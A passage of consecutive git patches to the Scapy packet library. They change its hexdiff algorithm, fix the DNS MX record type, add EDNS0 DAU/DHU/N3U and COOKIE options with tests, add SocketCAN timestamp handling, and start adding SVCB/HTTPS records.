https://docs.python.org/3.8/library/difflib.html#difflib.SequenceMatcher + Available algorithms: + - wagnerfischer: Use the Wagner and Fischer algorithm to compute the + Levenstein distance between the strings then backtrack. + - difflib: Use the difflib.SequenceMatcher implementation. This based on a + modified version of the Ratcliff and Obershelp algorithm. + This is much faster, but far less accurate. + https://docs.python.org/3.8/library/difflib.html#difflib.SequenceMatcher :param a: :param b: The binary strings, packets... to compare - :param autojunk: Setting it to True will likely increase the comparison - speed a lot on big byte strings, but will reduce accuracy (will tend - to miss insertion and see replacements instead for instance). + :param algo: Force the algo to be 'wagnerfischer' or 'difflib'. + By default, this is chosen depending on the complexity, optimistically + preferring wagnerfischer unless really necessary. + :param autojunk: (difflib only) See difflib documentation. """ - - # Compare the strings using difflib - xb = bytes_encode(a) yb = bytes_encode(b) - sm = difflib.SequenceMatcher(a=xb, b=yb, autojunk=autojunk) - xarr = [xb[i:i + 1] for i in range(len(xb))] - yarr = [yb[i:i + 1] for i in range(len(yb))] + if algo is None: + # Choose the best algorithm + complexity = len(xb) * len(yb) + if complexity < 1e7: + # Comparing two (non-jumbos) Ethernet packets is ~2e6 which is manageable. + # Anything much larger than this shouldn't be attempted by default. + algo = "wagnerfischer" + if complexity > 1e6: + log_interactive.info( + "Complexity is a bit high. hexdiff will take a few seconds." + ) + else: + algo = "difflib" backtrackx = [] backtracky = [] - for opcode in sm.get_opcodes(): - typ, x0, x1, y0, y1 = opcode - if typ == 'delete': - backtrackx += xarr[x0:x1] - backtracky += [b''] * (x1 - x0) - elif typ == 'insert': - backtrackx += [b''] * (y1 - y0) - backtracky += yarr[y0:y1] - elif typ in ['equal', 'replace']: - backtrackx += xarr[x0:x1] - backtracky += yarr[y0:y1] - - if autojunk: + + if algo == "wagnerfischer": + xb = xb[::-1] + yb = yb[::-1] + + # costs for the 3 operations + INSERT = 1 + DELETE = 1 + SUBST = 1 + + # Typically, d[i,j] will hold the distance between + # the first i characters of xb and the first j characters of yb. + # We change the Wagner Fischer to also store pointers to all + # the intermediate steps taken while calculating the Levenstein distance. + d = {(-1, -1): (0, (-1, -1))} + for j in range(len(yb)): + d[-1, j] = (j + 1) * INSERT, (-1, j - 1) + for i in range(len(xb)): + d[i, -1] = (i + 1) * INSERT + 1, (i - 1, -1) + + # Compute the Levenstein distance between the two strings, but + # store all the steps to be able to backtrack at the end. + for j in range(len(yb)): + for i in range(len(xb)): + d[i, j] = min( + (d[i - 1, j - 1][0] + SUBST * (xb[i] != yb[j]), (i - 1, j - 1)), + (d[i - 1, j][0] + DELETE, (i - 1, j)), + (d[i, j - 1][0] + INSERT, (i, j - 1)), + ) + + # Iterate through the steps backwards to create the diff + i = len(xb) - 1 + j = len(yb) - 1 + while not (i == j == -1): + i2, j2 = d[i, j][1] + backtrackx.append(xb[i2 + 1:i + 1]) + backtracky.append(yb[j2 + 1:j + 1]) + i, j = i2, j2 + elif algo == "difflib": + sm = difflib.SequenceMatcher(a=xb, b=yb, autojunk=autojunk) + xarr = [xb[i:i + 1] for i in range(len(xb))] + yarr = [yb[i:i + 1] for i in range(len(yb))] + # Iterate through opcodes to build the backtrack + for opcode in sm.get_opcodes(): + typ, x0, x1, y0, y1 = opcode + if typ == 'delete': + backtrackx += xarr[x0:x1] + backtracky += [b''] * (x1 - x0) + elif typ == 'insert': + backtrackx += [b''] * (y1 - y0) + backtracky += yarr[y0:y1] + elif typ in ['equal', 'replace']: + backtrackx += xarr[x0:x1] + backtracky += yarr[y0:y1] # Some lines may have been considered as junk. Check the sizes - lbx = len(backtrackx) - lby = len(backtracky) - backtrackx += [b''] * (max(lbx, lby) - lbx) - backtracky += [b''] * (max(lbx, lby) - lby) + if autojunk: + lbx = len(backtrackx) + lby = len(backtracky) + backtrackx += [b''] * (max(lbx, lby) - lbx) + backtracky += [b''] * (max(lbx, lby) - lby) + else: + raise ValueError("Unknown algorithm '%s'" % algo) # Print the diff diff --git a/test/regression.uts b/test/regression.uts index 2fbb322800a..9a09899d972 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -867,11 +867,11 @@ assert fletcher16_checkbytes(b"\x28\x07", 1) == b"\xaf(" = Test hexdiff function ~ not_pypy -def test_hexdiff(a, b, autojunk=False): +def test_hexdiff(a, b, algo=None, autojunk=False): conf_color_theme = conf.color_theme conf.color_theme = BlackAndWhite() with ContextManagerCaptureOutput() as cmco: - hexdiff(a, b, autojunk=autojunk) + hexdiff(a, b, algo=algo, autojunk=autojunk) result_hexdiff = cmco.get_output() conf.interactive = True conf.color_theme = conf_color_theme @@ -901,12 +901,12 @@ expected += "0010 7F 00 00 01 .... expected += " 0010 7F 00 00 02 ....\n" assert result_hexdiff == expected -# Compare using autojunk +# Compare using difflib a = "A" * 1000 + "findme" + "B" * 1000 b = "A" * 1000 + "B" * 1000 -ret1 = test_hexdiff(a, b) -ret2 = test_hexdiff(a, b, autojunk=True) +ret1 = test_hexdiff(a, b, algo="difflib") +ret2 = test_hexdiff(a, b, algo="difflib", autojunk=True) expected_ret1 = """ 03d0 03d0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA From d33c7b491d398cf1704b33d008aaa5fcafbe69e9 Mon Sep 17 00:00:00 2001 From: Gnought <1684105+gnought@users.noreply.github.com> Date: Tue, 10 Oct 2023 02:10:31 +0800 Subject: [PATCH 1148/1632] update type of `default` param in LEFieldLenField The `default` type should be same as its parent `FieldLenField` --- scapy/fields.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/scapy/fields.py b/scapy/fields.py index d2813190097..f082be247e1 100644 --- a/scapy/fields.py +++ b/scapy/fields.py @@ -2894,7 +2894,7 @@ class LEFieldLenField(FieldLenField): def __init__( self, name, # type: str - default, # type: int + default, # type: Optional[Any] length_of=None, # type: Optional[str] fmt=" Date: Wed, 6 Dec 2023 04:58:54 +0000 Subject: [PATCH 1149/1632] DNS: use the right type in MX RRs According to https://www.iana.org/assignments/dns-parameters/dns-parameters.xhtml#dns-parameters-4 it's 15. --- scapy/layers/dns.py | 2 +- test/scapy/layers/dns.uts | 5 +++++ 2 files changed, 6 insertions(+), 1 deletion(-) diff --git a/scapy/layers/dns.py b/scapy/layers/dns.py index ec1f9d8d3c3..9566faf600c 100644 --- a/scapy/layers/dns.py +++ b/scapy/layers/dns.py @@ -706,7 +706,7 @@ def default_payload_class(self, payload): class DNSRRMX(_DNSRRdummy): name = "DNS MX Resource Record" fields_desc = [DNSStrField("rrname", ""), - ShortEnumField("type", 6, dnstypes), + ShortEnumField("type", 15, dnstypes), ShortEnumField("rclass", 1, dnsclasses), IntField("ttl", 0), ShortField("rdlen", None), diff --git a/test/scapy/layers/dns.uts b/test/scapy/layers/dns.uts index c0c1de8b016..ed4d79df81c 100644 --- a/test/scapy/layers/dns.uts +++ b/test/scapy/layers/dns.uts @@ -204,6 +204,11 @@ full = b"\x04data\xc0\x0f" assert dns_get_str(full, full=full)[0] == b"data." += DNS record type 15 (MX) + +p = DNS(raw(DNS(qd=[],an=DNSRRMX(exchange='example.com')))) +assert p.an[0].exchange == b'example.com.' + = DNS record type 16 (TXT) p = DNS(raw(DNS(id=1,ra=1,qd=[],an=DNSRR(rrname='scapy', type='TXT', rdata="niceday", ttl=1)))) From 0dd08cd064134bcbf7c6bfbdbd356b69cdee05ac Mon Sep 17 00:00:00 2001 From: Evgeny Vereshchagin Date: Sun, 3 Dec 2023 03:48:07 +0000 Subject: [PATCH 1150/1632] DNS: add the DAU, DHU and N3U EDNS(0) options These options are used for signaling cryptographic algorithm understanding in DNS Security Extensions (DNSSEC): https://www.rfc-editor.org/rfc/rfc6975.html The patch was cross-checked with Wireshark: ```sh >>> dau = EDNS0DAU(alg_code=['RSA/SHA-256', 'RSA/SHA-512']) >>> dhu = EDNS0DHU(alg_code=['SHA-1', 'SHA-256', 'SHA-384']) >>> n3u = EDNS0N3U(alg_code=['SHA-1']) >>> tdecode(Ether()/IP()/UDP()/DNS(ar=[DNSRROPT(rdata=[dau, dhu, n3u])])) ... Option: DAU - DNSSEC Algorithm Understood (RFC6975) Option Code: DAU - DNSSEC Algorithm Understood (RFC6975) (5) Option Length: 2 Option Data: 080a DAU: RSA/SHA-256 (8) DAU: RSA/SHA-512 (10) Option: DHU - DS Hash Understood (RFC6975) Option Code: DHU - DS Hash Understood (RFC6975) (6) Option Length: 3 Option Data: 010204 DHU: SHA-1 (1) DHU: SHA-256 (2) DHU: SHA-384 (4) Option: N3U - NSEC3 Hash Understood (RFC6975) Option Code: N3U - NSEC3 Hash Understood (RFC6975) (7) Option Length: 1 Option Data: 01 N3U: SHA-1 (1) ``` --- scapy/layers/dns.py | 100 ++++++++++++++++++++++---------- test/scapy/layers/dns_edns0.uts | 62 ++++++++++++++++++++ 2 files changed, 130 insertions(+), 32 deletions(-) diff --git a/scapy/layers/dns.py b/scapy/layers/dns.py index 9566faf600c..30498247c5d 100644 --- a/scapy/layers/dns.py +++ b/scapy/layers/dns.py @@ -34,6 +34,7 @@ ConditionalField, Field, FieldLenField, + FieldListField, FlagsField, I, IP6Field, @@ -89,6 +90,22 @@ dnsclasses = {1: 'IN', 2: 'CS', 3: 'CH', 4: 'HS', 255: 'ANY'} +# 09/2013 from http://www.iana.org/assignments/dns-sec-alg-numbers/dns-sec-alg-numbers.xhtml # noqa: E501 +dnssecalgotypes = {0: "Reserved", 1: "RSA/MD5", 2: "Diffie-Hellman", 3: "DSA/SHA-1", # noqa: E501 + 4: "Reserved", 5: "RSA/SHA-1", 6: "DSA-NSEC3-SHA1", + 7: "RSASHA1-NSEC3-SHA1", 8: "RSA/SHA-256", 9: "Reserved", + 10: "RSA/SHA-512", 11: "Reserved", 12: "GOST R 34.10-2001", + 13: "ECDSA Curve P-256 with SHA-256", 14: "ECDSA Curve P-384 with SHA-384", # noqa: E501 + 252: "Reserved for Indirect Keys", 253: "Private algorithms - domain name", # noqa: E501 + 254: "Private algorithms - OID", 255: "Reserved"} + +# 09/2013 from http://www.iana.org/assignments/ds-rr-types/ds-rr-types.xhtml +dnssecdigesttypes = {0: "Reserved", 1: "SHA-1", 2: "SHA-256", 3: "GOST R 34.11-94", 4: "SHA-384"} # noqa: E501 + +# 12/2023 from https://www.iana.org/assignments/dnssec-nsec3-parameters/dnssec-nsec3-parameters.xhtml # noqa: E501 +dnssecnsec3algotypes = {0: "Reserved", 1: "SHA-1"} + + def dns_get_str(s, full=None, _ignore_compression=False): """This function decompresses a string s, starting from the given pointer. @@ -387,21 +404,25 @@ def i2m(self, pkt, s): # RFC 2671 - Extension Mechanisms for DNS (EDNS0) edns0types = {0: "Reserved", 1: "LLQ", 2: "UL", 3: "NSID", 4: "Reserved", - 5: "PING", 8: "edns-client-subnet", 10: "COOKIE", + 5: "DAU", 6: "DHU", 7: "N3U", 8: "edns-client-subnet", 10: "COOKIE", 15: "Extended DNS Error"} -class EDNS0TLV(Packet): +class _EDNS0Dummy(Packet): + name = "Dummy class that implements extract_padding()" + + def extract_padding(self, p): + # type: (bytes) -> Tuple[bytes, Optional[bytes]] + return "", p + + +class EDNS0TLV(_EDNS0Dummy): name = "DNS EDNS0 TLV" fields_desc = [ShortEnumField("optcode", 0, edns0types), FieldLenField("optlen", None, "optdata", fmt="H"), StrLenField("optdata", "", length_from=lambda pkt: pkt.optlen)] - def extract_padding(self, p): - # type: (bytes) -> Tuple[bytes, Optional[bytes]] - return "", p - @classmethod def dispatch_hook(cls, _pkt=None, *args, **kargs): # type: (Optional[bytes], *Any, **Any) -> Type[Packet] @@ -410,11 +431,7 @@ def dispatch_hook(cls, _pkt=None, *args, **kargs): if len(_pkt) < 2: return Raw edns0type = struct.unpack("!H", _pkt[:2])[0] - if edns0type == 8: - return EDNS0ClientSubnet - if edns0type == 15: - return EDNS0ExtendedDNSError - return EDNS0TLV + return EDNS0OPT_DISPATCHER.get(edns0type, EDNS0TLV) class DNSRROPT(Packet): @@ -432,6 +449,36 @@ class DNSRROPT(Packet): length_from=lambda pkt: pkt.rdlen)] +# RFC 6975 - Signaling Cryptographic Algorithm Understanding in +# DNS Security Extensions (DNSSEC) + +class EDNS0DAU(_EDNS0Dummy): + name = "DNSSEC Algorithm Understood (DAU)" + fields_desc = [ShortEnumField("optcode", 5, edns0types), + FieldLenField("optlen", None, count_of="alg_code", fmt="H"), + FieldListField("alg_code", None, + ByteEnumField("", 0, dnssecalgotypes), + count_from=lambda pkt:pkt.optlen)] + + +class EDNS0DHU(_EDNS0Dummy): + name = "DS Hash Understood (DHU)" + fields_desc = [ShortEnumField("optcode", 6, edns0types), + FieldLenField("optlen", None, count_of="alg_code", fmt="H"), + FieldListField("alg_code", None, + ByteEnumField("", 0, dnssecdigesttypes), + count_from=lambda pkt:pkt.optlen)] + + +class EDNS0N3U(_EDNS0Dummy): + name = "NSEC3 Hash Understood (N3U)" + fields_desc = [ShortEnumField("optcode", 7, edns0types), + FieldLenField("optlen", None, count_of="alg_code", fmt="H"), + FieldListField("alg_code", None, + ByteEnumField("", 0, dnssecnsec3algotypes), + count_from=lambda pkt:pkt.optlen)] + + # RFC 7871 - Client Subnet in DNS Queries class ClientSubnetv4(StrLenField): @@ -489,7 +536,7 @@ class ClientSubnetv6(ClientSubnetv4): af_default = b"\x20" # 2000:: -class EDNS0ClientSubnet(Packet): +class EDNS0ClientSubnet(_EDNS0Dummy): name = "DNS EDNS0 Client Subnet" fields_desc = [ShortEnumField("optcode", 8, edns0types), FieldLenField("optlen", None, "address", fmt="H", @@ -510,9 +557,6 @@ class EDNS0ClientSubnet(Packet): ClientSubnetv4("address", "192.168.0.0", length_from=lambda p: p.source_plen))] - def extract_padding(self, p): - return "", p - # RFC 8914 - Extended DNS Errors @@ -552,7 +596,7 @@ def extract_padding(self, p): # https://www.rfc-editor.org/rfc/rfc8914.html -class EDNS0ExtendedDNSError(Packet): +class EDNS0ExtendedDNSError(_EDNS0Dummy): name = "DNS EDNS0 Extended DNS Error" fields_desc = [ShortEnumField("optcode", 15, edns0types), FieldLenField("optlen", None, length_of="extra_text", fmt="!H", @@ -561,25 +605,17 @@ class EDNS0ExtendedDNSError(Packet): StrLenField("extra_text", "", length_from=lambda pkt: pkt.optlen - 2)] - def extract_padding(self, p): - return "", p - - -# RFC 4034 - Resource Records for the DNS Security Extensions - -# 09/2013 from http://www.iana.org/assignments/dns-sec-alg-numbers/dns-sec-alg-numbers.xhtml # noqa: E501 -dnssecalgotypes = {0: "Reserved", 1: "RSA/MD5", 2: "Diffie-Hellman", 3: "DSA/SHA-1", # noqa: E501 - 4: "Reserved", 5: "RSA/SHA-1", 6: "DSA-NSEC3-SHA1", - 7: "RSASHA1-NSEC3-SHA1", 8: "RSA/SHA-256", 9: "Reserved", - 10: "RSA/SHA-512", 11: "Reserved", 12: "GOST R 34.10-2001", - 13: "ECDSA Curve P-256 with SHA-256", 14: "ECDSA Curve P-384 with SHA-384", # noqa: E501 - 252: "Reserved for Indirect Keys", 253: "Private algorithms - domain name", # noqa: E501 - 254: "Private algorithms - OID", 255: "Reserved"} +EDNS0OPT_DISPATCHER = { + 5: EDNS0DAU, + 6: EDNS0DHU, + 7: EDNS0N3U, + 8: EDNS0ClientSubnet, + 15: EDNS0ExtendedDNSError, +} -# 09/2013 from http://www.iana.org/assignments/ds-rr-types/ds-rr-types.xhtml -dnssecdigesttypes = {0: "Reserved", 1: "SHA-1", 2: "SHA-256", 3: "GOST R 34.11-94", 4: "SHA-384"} # noqa: E501 +# RFC 4034 - Resource Records for the DNS Security Extensions def bitmap2RRlist(bitmap): """ diff --git a/test/scapy/layers/dns_edns0.uts b/test/scapy/layers/dns_edns0.uts index 02385d845e0..dd7e5df6065 100644 --- a/test/scapy/layers/dns_edns0.uts +++ b/test/scapy/layers/dns_edns0.uts @@ -78,6 +78,63 @@ def _test(): retry_test(_test) ++ EDNS0 - DAU + += Basic instantiation & dissection + +b = b'\x00\x05\x00\x00' + +p = EDNS0DAU() +assert raw(p) == b + +p = EDNS0DAU(b) +assert p.optcode == 5 and p.optlen == 0 and p.alg_code == [] + +b = raw(EDNS0DAU(alg_code=['RSA/SHA-256', 'RSA/SHA-512'])) + +p = EDNS0DAU(b) +repr(p) +assert p.optcode == 5 and p.optlen == 2 and p.alg_code == [8, 10] + + ++ EDNS0 - DHU + += Basic instantiation & dissection + +b = b'\x00\x06\x00\x00' + +p = EDNS0DHU() +assert raw(p) == b + +p = EDNS0DHU(b) +assert p.optcode == 6 and p.optlen == 0 and p.alg_code == [] + +b = raw(EDNS0DHU(alg_code=['SHA-1', 'SHA-256', 'SHA-384'])) + +p = EDNS0DHU(b) +repr(p) +assert p.optcode == 6 and p.optlen == 3 and p.alg_code == [1, 2, 4] + + ++ EDNS0 - N3U + += Basic instantiation & dissection + +b = b'\x00\x07\x00\x00' + +p = EDNS0N3U() +assert raw(p) == b + +p = EDNS0N3U(b) +assert p.optcode == 7 and p.optlen == 0 and p.alg_code == [] + +b = raw(EDNS0N3U(alg_code=['SHA-1'])) + +p = EDNS0N3U(b) +repr(p) +assert p.optcode == 7 and p.optlen == 1 and p.alg_code == [1] + + + EDNS0 - Client Subnet = Basic instantiation & dissection @@ -123,3 +180,8 @@ assert p.info_code == 6 and p.optlen == 45 and p.extra_text == b'proof of non-ex p = DNSRROPT(raw(DNSRROPT(rdata=[EDNS0ExtendedDNSError(), EDNS0ClientSubnet(), EDNS0TLV()]))) assert len(p.rdata) == 3 assert all(Raw not in opt for opt in p.rdata) + +for opt_class in EDNS0OPT_DISPATCHER.values(): + p = DNSRROPT(raw(DNSRROPT(rdata=[EDNS0TLV(), opt_class(), opt_class()]))) + assert len(p.rdata) == 3 + assert all(Raw not in opt for opt in p.rdata) From f9c7d957466174c2f7a4e83007b5082e9fd68a01 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Mon, 1 Jan 2024 13:36:36 +0100 Subject: [PATCH 1151/1632] Use aux data in NativeCANSocket to determine timestamp of packet (#4208) * Use aux data in NativeCANSocket to determine timestamp of packet * debug unit test * fix unit test --- scapy/contrib/cansocket_native.py | 33 ++++++++++++++++++---- scapy/contrib/isotp/isotp_native_socket.py | 2 +- test/contrib/cansocket_native.uts | 2 +- 3 files changed, 30 insertions(+), 7 deletions(-) diff --git a/scapy/contrib/cansocket_native.py b/scapy/contrib/cansocket_native.py index ba9ef0ff440..49efacd457c 100644 --- a/scapy/contrib/cansocket_native.py +++ b/scapy/contrib/cansocket_native.py @@ -15,11 +15,11 @@ import time from scapy.config import conf +from scapy.data import SO_TIMESTAMPNS from scapy.supersocket import SuperSocket -from scapy.error import Scapy_Exception, warning +from scapy.error import Scapy_Exception, warning, log_runtime from scapy.packet import Packet from scapy.layers.can import CAN, CAN_MTU, CAN_FD_MTU -from scapy.arch.linux import get_last_packet_timestamp from scapy.compat import raw from typing import ( @@ -84,6 +84,20 @@ def __init__(self, "Could not modify receive own messages (%s)", exception ) + try: + # Receive Auxiliary Data (Timestamps) + self.ins.setsockopt( + socket.SOL_SOCKET, + SO_TIMESTAMPNS, + 1 + ) + self.auxdata_available = True + except OSError: + # Note: Auxiliary Data is only supported since + # Linux 2.6.21 + msg = "Your Linux Kernel does not support Auxiliary Data!" + log_runtime.info(msg) + if self.fd: try: self.ins.setsockopt(socket.SOL_CAN_RAW, @@ -118,8 +132,9 @@ def recv_raw(self, x=CAN_MTU): # type: (int) -> Tuple[Optional[Type[Packet]], Optional[bytes], Optional[float]] # noqa: E501 """Returns a tuple containing (cls, pkt_data, time)""" pkt = None + ts = None try: - pkt = self.ins.recv(self.MTU) + pkt, _, ts = self._recv_raw(self.ins, self.MTU) except BlockingIOError: # noqa: F821 warning("Captured no data, socket in non-blocking mode.") except socket.timeout: @@ -130,14 +145,22 @@ def recv_raw(self, x=CAN_MTU): # need to change the byte order of the first four bytes, # required by the underlying Linux SocketCAN frame format - if not conf.contribs['CAN']['swap-bytes'] and pkt is not None: + if not conf.contribs['CAN']['swap-bytes'] and pkt: pack_fmt = " int + if x is None: + return 0 + try: x.sent_time = time.time() except AttributeError: diff --git a/scapy/contrib/isotp/isotp_native_socket.py b/scapy/contrib/isotp/isotp_native_socket.py index 7718365c954..127e91f6d0e 100644 --- a/scapy/contrib/isotp/isotp_native_socket.py +++ b/scapy/contrib/isotp/isotp_native_socket.py @@ -390,7 +390,7 @@ def recv_raw(self, x=0xffff): self.close() return None, None, None - if ts is None: + if pkt and ts is None: ts = get_last_packet_timestamp(self.ins) return self.basecls, pkt, ts diff --git a/test/contrib/cansocket_native.uts b/test/contrib/cansocket_native.uts index 22d48de1117..fedf063eef6 100644 --- a/test/contrib/cansocket_native.uts +++ b/test/contrib/cansocket_native.uts @@ -140,7 +140,7 @@ sock1.close() = sr can check rx and tx -assert tx.sent_time > 0 and rx.time > 0 and tx.sent_time < rx.time +assert tx.sent_time > 0 and rx.time > 0 = sniff with filtermask 0x7ff From a3f2cb1976416be74248e25e5266086e634e2fd1 Mon Sep 17 00:00:00 2001 From: "Teppei.F" <37261985+T3pp31@users.noreply.github.com> Date: Mon, 1 Jan 2024 21:38:48 +0900 Subject: [PATCH 1152/1632] Fix typo (#4210) Co-authored-by: fukutomi <150325208+kyd-ft@users.noreply.github.com> --- scapy/layers/dot11.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/scapy/layers/dot11.py b/scapy/layers/dot11.py index 8c95a019c6f..84e25b84b84 100644 --- a/scapy/layers/dot11.py +++ b/scapy/layers/dot11.py @@ -970,7 +970,7 @@ def network_stats(self): 61: "HT Operation", 74: "Overlapping BSS Scan Parameters", 107: "Interworking", - 127: "Extendend Capabilities", + 127: "Extended Capabilities", 191: "VHT Capabilities", 192: "VHT Operation", 221: "Vendor Specific" From ba7ff8cc2a6dd9dc9bdab6eceb706fff36e22fad Mon Sep 17 00:00:00 2001 From: Evgeny Vereshchagin Date: Sat, 16 Dec 2023 03:11:03 +0000 Subject: [PATCH 1153/1632] DNS: update DNSSEC algorithm numbers The patch was cross-checked with Wireshark: ``` tdecode(Ether()/IP()/UDP()/DNS(ar=[DNSRROPT(rdata=[EDNS0DAU(alg_code=['Ed25519', 'Ed448'])])])) ... Option: DAU - DNSSEC Algorithm Understood (RFC6975) Option Code: DAU - DNSSEC Algorithm Understood (RFC6975) (5) Option Length: 2 Option Data: 0f10 DAU: Ed25519 (15) DAU: Ed448 (16) ``` It's a follow-up to 0dd08cd064134bcbf7c6bfbdbd356b69cdee05ac --- scapy/layers/dns.py | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/scapy/layers/dns.py b/scapy/layers/dns.py index 30498247c5d..8d394bf72be 100644 --- a/scapy/layers/dns.py +++ b/scapy/layers/dns.py @@ -90,16 +90,17 @@ dnsclasses = {1: 'IN', 2: 'CS', 3: 'CH', 4: 'HS', 255: 'ANY'} -# 09/2013 from http://www.iana.org/assignments/dns-sec-alg-numbers/dns-sec-alg-numbers.xhtml # noqa: E501 +# 12/2023 from https://www.iana.org/assignments/dns-sec-alg-numbers/dns-sec-alg-numbers.xhtml # noqa: E501 dnssecalgotypes = {0: "Reserved", 1: "RSA/MD5", 2: "Diffie-Hellman", 3: "DSA/SHA-1", # noqa: E501 4: "Reserved", 5: "RSA/SHA-1", 6: "DSA-NSEC3-SHA1", 7: "RSASHA1-NSEC3-SHA1", 8: "RSA/SHA-256", 9: "Reserved", 10: "RSA/SHA-512", 11: "Reserved", 12: "GOST R 34.10-2001", 13: "ECDSA Curve P-256 with SHA-256", 14: "ECDSA Curve P-384 with SHA-384", # noqa: E501 + 15: "Ed25519", 16: "Ed448", 252: "Reserved for Indirect Keys", 253: "Private algorithms - domain name", # noqa: E501 254: "Private algorithms - OID", 255: "Reserved"} -# 09/2013 from http://www.iana.org/assignments/ds-rr-types/ds-rr-types.xhtml +# 12/2023 from https://www.iana.org/assignments/ds-rr-types/ds-rr-types.xhtml dnssecdigesttypes = {0: "Reserved", 1: "SHA-1", 2: "SHA-256", 3: "GOST R 34.11-94", 4: "SHA-384"} # noqa: E501 # 12/2023 from https://www.iana.org/assignments/dnssec-nsec3-parameters/dnssec-nsec3-parameters.xhtml # noqa: E501 From 084400f72cc4db5826e6de145ab024c76d793a4b Mon Sep 17 00:00:00 2001 From: Evgeny Vereshchagin Date: Sun, 24 Dec 2023 20:25:17 +0000 Subject: [PATCH 1154/1632] DNS: add the DNS COOKIE EDNS(0) option https://datatracker.ietf.org/doc/html/rfc7873#section-4 The patch was cross-checked with Wireshark: ``` tdecode(Ether()/IPv6()/UDP()/DNS(qd=[], ar=[DNSRROPT(rdata=[EDNS0COOKIE(client_cookie=b'\x01'*8, server_cookie=b'\x02'*16)])])) ... Data length: 28 Option: COOKIE Option Code: COOKIE (10) Option Length: 24 Option Data: 010101010101010102020202020202020202020202020202 Client Cookie: 0101010101010101 Server Cookie: 02020202020202020202020202020202 ``` --- scapy/layers/dns.py | 13 +++++++++++++ test/scapy/layers/dns_edns0.uts | 27 +++++++++++++++++++++++++++ 2 files changed, 40 insertions(+) diff --git a/scapy/layers/dns.py b/scapy/layers/dns.py index 8d394bf72be..a1281a6d981 100644 --- a/scapy/layers/dns.py +++ b/scapy/layers/dns.py @@ -46,6 +46,8 @@ StrField, StrLenField, UTCTimeField, + XStrFixedLenField, + XStrLenField, ) from scapy.sendrecv import sr1 from scapy.supersocket import StreamSocket @@ -559,6 +561,16 @@ class EDNS0ClientSubnet(_EDNS0Dummy): length_from=lambda p: p.source_plen))] +class EDNS0COOKIE(_EDNS0Dummy): + name = "DNS EDNS0 COOKIE" + fields_desc = [ShortEnumField("optcode", 10, edns0types), + FieldLenField("optlen", None, length_of="server_cookie", fmt="!H", + adjust=lambda pkt, x: x + 8), + XStrFixedLenField("client_cookie", b"\x00" * 8, length=8), + XStrLenField("server_cookie", "", + length_from=lambda pkt: max(0, pkt.optlen - 8))] + + # RFC 8914 - Extended DNS Errors # https://www.iana.org/assignments/dns-parameters/dns-parameters.xhtml#extended-dns-error-codes @@ -612,6 +624,7 @@ class EDNS0ExtendedDNSError(_EDNS0Dummy): 6: EDNS0DHU, 7: EDNS0N3U, 8: EDNS0ClientSubnet, + 10: EDNS0COOKIE, 15: EDNS0ExtendedDNSError, } diff --git a/test/scapy/layers/dns_edns0.uts b/test/scapy/layers/dns_edns0.uts index dd7e5df6065..b8b1202f8bf 100644 --- a/test/scapy/layers/dns_edns0.uts +++ b/test/scapy/layers/dns_edns0.uts @@ -155,6 +155,33 @@ d = DNSRROPT(raw_d) assert EDNS0ClientSubnet in d.rdata[0] and d.rdata[0].family == 2 and d.rdata[0].address == "2001:db8::" ++ EDNS0 - Cookie + += Basic instantiation & dissection + +b = b'\x00\n\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00' + +p = EDNS0COOKIE() +assert raw(p) == b + +p = EDNS0COOKIE(b) +assert p.optcode == 10 +assert p.optlen == 8 +assert p.client_cookie == b'\x00' * 8 +assert p.server_cookie == b'' + +b = b'\x00\n\x00\x18\x01\x01\x01\x01\x01\x01\x01\x01\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02' + +p = EDNS0COOKIE(client_cookie=b'\x01' * 8, server_cookie=b'\x02' * 16) +assert raw(p) == b + +p = EDNS0COOKIE(b) +assert p.optcode == 10 +assert p.optlen == 24 +assert p.client_cookie == b'\x01' * 8 +assert p.server_cookie == b'\x02' * 16 + + + EDNS0 - Extended DNS Error = Basic instantiation & dissection From 51c07540eef76a53cbd3cce0980bae01577fb37c Mon Sep 17 00:00:00 2001 From: Evgeny Vereshchagin Date: Mon, 15 Jan 2024 22:10:59 +0300 Subject: [PATCH 1155/1632] DNS: add the SVCB/HTTPS resource records (#4217) https://www.rfc-editor.org/rfc/rfc9460.html ``` >>> p = dns_resolve('_dns.one.one.one.one', 'SVCB', raw=True) >>> p.an[0].show() rrname = b'_dns.one.one.one.one.' type = SVCB rclass = IN ttl = 300 rdlen = None svc_priority= 1 target_name= b'one.one.one.one.' \svc_params\ |###[ SvcParam ]### | key = alpn | len = 6 | value = [b'h3', b'h2'] |###[ SvcParam ]### | key = dohpath | len = 16 | value = b'/dns-query{?dns}' >>> p.an[1].show() rrname = b'_dns.one.one.one.one.' type = SVCB rclass = IN ttl = 300 rdlen = None svc_priority= 2 target_name= b'one.one.one.one.' \svc_params\ |###[ SvcParam ]### | key = alpn | len = 4 | value = [b'dot'] ``` The patch was also cross-checked with Wireshark: ``` >>> alpn = SvcParam(key='alpn', value=['h3', 'h2']) >>> ipv4hint = SvcParam(key='ipv4hint', value=['104.16.132.229', '104.16.133.229']) >>> ipv6hint = SvcParam(key='ipv6hint', value=['2606:4700::6810:84e5', '2606:4700::6810:85e5']) >>> httpsrr = DNSRRHTTPS(rrname='cloudflare.com', svc_priority=1, ttl=62, target_name='.', svc_params=[alpn, ipv4hint, ipv6hint]) >>> tdecode(Ether()/IP()/UDP()/DNS(qd=[], an=[httpsrr])) ... Type: HTTPS (HTTPS Specific Service Endpoints) (65) Class: IN (0x0001) Time to live: 62 (1 minute, 2 seconds) Data length: 61 SvcPriority: 1 TargetName: SvcParam: alpn=h3,h2 SvcParamKey: alpn (1) SvcParamValue length: 6 ALPN length: 2 ALPN: h3 ALPN length: 2 ALPN: h2 SvcParam: ipv4hint=104.16.132.229,104.16.133.229 SvcParamKey: ipv4hint (4) SvcParamValue length: 8 IP: 104.16.132.229 IP: 104.16.133.229 SvcParam: ipv6hint=2606:4700::6810:84e5,2606:4700::6810:85e5 SvcParamKey: ipv6hint (6) SvcParamValue length: 32 IP: 2606:4700::6810:84e5 IP: 2606:4700::6810:85e5 ``` This patch was prompted by https://github.com/systemd/systemd/pull/30661#issuecomment-1872487949 and was used to parse SVCB/HTTPS RRs produced by an 